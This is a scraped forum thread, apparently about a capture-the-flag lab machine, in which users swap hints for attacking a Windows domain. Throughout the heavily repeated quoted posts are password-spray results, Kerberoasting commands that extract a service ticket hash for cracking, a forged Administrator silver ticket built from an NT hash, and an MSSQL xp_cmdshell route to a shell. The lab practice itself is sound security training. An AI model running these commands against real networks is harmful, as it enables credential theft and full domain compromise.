2022/06/12 04:37:07 >  [+] VALID LOGIN:  [email protected]:ksimpson

2022/06/12 04:36:40 >  [+] VALID LOGIN:  [email protected]:Pegasus60

(June 12, 2022, 07:45 AM)yemacaw863 Wrote:

(June 12, 2022, 04:32 AM)thomasratkos Wrote:

(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for thi post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?

its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎

Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py to query the windows registry.

And now.. I'm stuck again :(

(June 12, 2022, 08:53 AM)langetmama11 Wrote:

(June 12, 2022, 07:45 AM)yemacaw863 Wrote:

(June 12, 2022, 04:32 AM)thomasratkos Wrote:

(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for thi post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?

its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎

Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py to query the windows registry.

And now.. I'm stuck again :(

How did you manage to get the smbclient to work?

(June 12, 2022, 03:42 AM)thomasratkos Wrote: get ksimpsons TGT:

getTGT "kerberos+pass://scrm.local\ksimpson:[email protected]" krb_ccache


use kerberos login to get sqlsvc TGS for cracking:

GetUserSPNs.py  -dc-ip dc1.scrm.local scrm.local/sqlsvc -request -k -no-pass

ServicePrincipalName          Name    MemberOf  PasswordLastSet            LastLogon                  Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-06-11 21:41:15.566050           
MSSQLSvc/dc1.scrm.local      sqlsvc            2021-11-03 12:32:02.351452  2022-06-11 21:41:15.566050           



$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$488b33086784ae1b2e7ebdad2f41bb3a$9a0f4e9da2d5f77a032388a6e1f9b25aeaac92ec33e782fc0afb7246d79bea39e2e2271bb484cf0c7f000200f3032c13c71bb8899ecb5cd2679619c258d67c7d1438569daa8133854f69e3c030de5f2bd20387eaca43438eead34c1dbf751aa9b9b2269b0e232a043f5cc3f59ac1026d132c09416e6e549773f60288975f62ec0507110d004437d0462e325038f9d5cb5844db29404694fed9e1f23f990a7d5203e8811f781033baf3c1ea54XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

use kerberos login to get sqlsvc TGS for cracking:

(June 12, 2022, 09:10 AM)yemacaw863 Wrote:

(June 12, 2022, 08:53 AM)langetmama11 Wrote:

(June 12, 2022, 07:45 AM)yemacaw863 Wrote:

(June 12, 2022, 04:32 AM)thomasratkos Wrote:

(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for thi post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?

its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎

Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py to query the windows registry.

And now.. I'm stuck again :(

How did you manage to get the smbclient to work?

getTGT.py scrm.local/<user>:<pass> -dc-ip <ip>
export KRB5CCNAME=<user>.ccache
smbclient.py -no-pass -k scrm.local/<user>@<ip> -dc-ip <ip>

Note: It's impacket's smbclient.py not the regular smbclient

---

@qwerty173 / @jon01 any nudge? :D

python3 smbclient.py -k -no-pass scrm.local/[email protected] -dc-ip 10.129.xx.xx
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)

(June 12, 2022, 11:43 AM)jon01 Wrote:

(June 12, 2022, 07:45 AM)yemacaw863 Wrote:

(June 12, 2022, 04:32 AM)thomasratkos Wrote:

(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for thi post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?

its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎

Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py using both users to query the windows registry (different results).

And now.. I'm stuck again :(

---

@qwerty173 / @jon01 any nudge? :D

impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/scrm.local -user-id 500 Administrator           

// may be this can help :P
impacket-mssqlclient
enable_xp_cmdshell
and get a shell :

(June 12, 2022, 12:08 PM)jon01 Wrote:

(June 12, 2022, 12:00 PM)hacker1111 Wrote:

(June 12, 2022, 11:43 AM)jon01 Wrote:

(June 12, 2022, 07:45 AM)yemacaw863 Wrote:

(June 12, 2022, 04:32 AM)thomasratkos Wrote: its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎

Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py using both users to query the windows registry (different results).

And now.. I'm stuck again :(

---

@qwerty173 / @jon01 any nudge? :D

impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/scrm.local -user-id 500 Administrator           

// may be this can help :P
impacket-mssqlclient
enable_xp_cmdshell
and get a shell :

i'm not able to connect mssqlclient.py client and btw how did u get nthash and domain-sid ?

export KRB5CCNAME=Administrator.ccache // try this

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*]Encryption required, switching to TLS
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)

(June 12, 2022, 12:28 PM)jon01 Wrote:

(June 12, 2022, 12:17 PM)hacker1111 Wrote:

(June 12, 2022, 12:08 PM)jon01 Wrote:

(June 12, 2022, 12:00 PM)hacker1111 Wrote:

(June 12, 2022, 11:43 AM)jon01 Wrote: impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/scrm.local -user-id 500 Administrator           

// may be this can help :P
impacket-mssqlclient
enable_xp_cmdshell
and get a shell :

i'm not able to connect mssqlclient.py client and btw how did u get nthash and domain-sid ?

export KRB5CCNAME=Administrator.ccache // try this

mssqlclient.py dc1.scrm.local/[email protected] -k -no-pass

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*]Encryption required, switching to TLS
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)

impacket-mssqlclient -k scrm.local

(June 12, 2022, 11:43 AM)jon01 Wrote:

(June 12, 2022, 07:45 AM)yemacaw863 Wrote:

(June 12, 2022, 04:32 AM)thomasratkos Wrote:

(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for thi post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?

its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎

Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py using both users to query the windows registry (different results).

And now.. I'm stuck again :(

---

@qwerty173 / @jon01 any nudge? :D

impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/scrm.local -user-id 500 Administrator           

// may be this can help :P
impacket-mssqlclient
enable_xp_cmdshell
and get a shell :